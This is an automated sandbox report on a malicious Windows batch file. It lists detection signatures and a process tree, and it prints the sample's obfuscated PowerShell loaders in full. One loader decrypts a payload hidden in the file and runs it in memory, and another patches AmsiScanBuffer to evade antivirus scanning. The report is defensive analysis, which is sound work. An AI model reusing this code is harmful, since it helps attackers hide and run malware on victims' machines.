Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Q5N7WOpk8J.bat

Overview

General Information

Sample name:Q5N7WOpk8J.bat
renamed because original name is a hash value
Original sample name:5c6dbf4219fd4e2251de392eb2544581.bat
Analysis ID:1519360
MD5:5c6dbf4219fd4e2251de392eb2544581
SHA1:8f79ac10fd2bf6f5324ff9c19f278e3f9d5b4fa3
SHA256:fd4270f11afee189662bb9bd907f3d732002a44a76ab3c356b50e0e64a4e81b4
Tags:batuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Deletes itself after installation
Found large BAT file
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 2936 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WMIC.exe (PID: 6720 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 5480 cmdline: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • WMIC.exe (PID: 7228 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • findstr.exe (PID: 7244 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
    • cmd.exe (PID: 7340 cmdline: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • powershell.exe (PID: 7348 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7744 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7792 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7808 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WMIC.exe (PID: 7940 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 7956 cmdline: findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • WMIC.exe (PID: 7992 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
            • findstr.exe (PID: 8012 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
            • cmd.exe (PID: 8076 cmdline: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • powershell.exe (PID: 8084 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
              • schtasks.exe (PID: 1352 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7252 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • powershell.exe (PID: 6696 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:oxbNdIdJMSmp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KEMhNhDQCLRUNV,[Parameter(Position=1)][Type]$HGdpxLKyUQ)$khFifhQytpa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+'yD'+'e'+''+'l'+''+[Char](101)+''+'g'+'a'+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+''+','+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+'i'+'C'+[Char](108)+'a'+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+[Char](111)+'Cla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$khFifhQytpa.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+'c'+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+','+'P'+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KEMhNhDQCLRUNV).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+'t'+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+'a'+''+'n'+'ag'+'e'+''+[Char](100)+'');$khFifhQytpa.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+',N'+'e'+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$HGdpxLKyUQ,$KEMhNhDQCLRUNV).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $khFifhQytpa.CreateType();}$KRrkXMMJHQAWa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'ll')}).GetType(''+'M'+''+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.Un'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+'d'+''+'s'+'');$doZKqFPbZxNLSh=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+'et'+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+'ddre'+[Char](115)+'s',[Reflection.BindingFlags]('P'+[Char](117)+'bli'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MlhLFxQWSgAKoXShnVb=oxbNdIdJMSmp @([String])([IntPtr]);$VJNyACbUNbdCoehksOpZGU=oxbNdIdJMSmp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YJrcNCzTvEU=$KRrkXMMJHQAWa.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+'a'+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$IHAbcsfdEtkEyD=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+'b'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$QNPqhRmAgVHBRCOcZ=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$YJrcNCzTvEU,[Object](''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+'t')));$NjQOgbk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IHAbcsfdEtkEyD,$MlhLFxQWSgAKoXShnVb).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+''+[Char](46)+'d'+'l'+''+'l'+'');$tHbMpbZeVqMdjOqLT=$doZKqFPbZxNLSh.Invoke($Null,@([Object]$NjQOgbk,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+'a'+'n'+'B'+'uff'+[Char](101)+''+'r'+'')));$dMXDRTQmEn=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,4,[ref]$dMXDRTQmEn);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tHbMpbZeVqMdjOqLT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QNPqhRmAgVHBRCOcZ,$VJNyACbUNbdCoehksOpZGU).Invoke($tHbMpbZeVqMdjOqLT,[uint32]8,0x20,[ref]$dMXDRTQmEn);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+'T'+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](99)+''+'n'+'t'+[Char](45)+'s'+[Char](116)+'a'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dllhost.exe (PID: 3268 cmdline: C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
      • winlogon.exe (PID: 556 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 632 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 912 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 976 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
      • svchost.exe (PID: 356 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 704 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 932 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1064 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1080 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1188 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1212 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1344 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1376 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1388 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1400 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1436 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1520 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1636 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1668 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • Conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 8084INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x520:$b2: ::FromBase64String(
  • 0x2bb1c:$b2: ::FromBase64String(
  • 0x2bb7a:$b2: ::FromBase64String(
  • 0x95a3d:$b2: ::FromBase64String(
  • 0x261df:$s1: -join
  • 0xc0dce:$s1: -join
  • 0xc30da:$s1: -join
  • 0x1d40d:$s3: Reverse
  • 0x1e2bc:$s3: Reverse
  • 0x20c14:$s4: +=
  • 0x20cb6:$s4: +=
  • 0x243fe:$s4: +=
  • 0x25eb4:$s4: +=
  • 0x260ca:$s4: +=
  • 0x261c1:$s4: +=
  • 0x3665a:$s4: +=
  • 0xbd01b:$s4: +=
  • 0xbd03a:$s4: +=
  • 0xbd075:$s4: +=
  • 0xbd092:$s4: +=
  • 0xbd0cd:$s4: +=

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); , CommandLine: cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}f
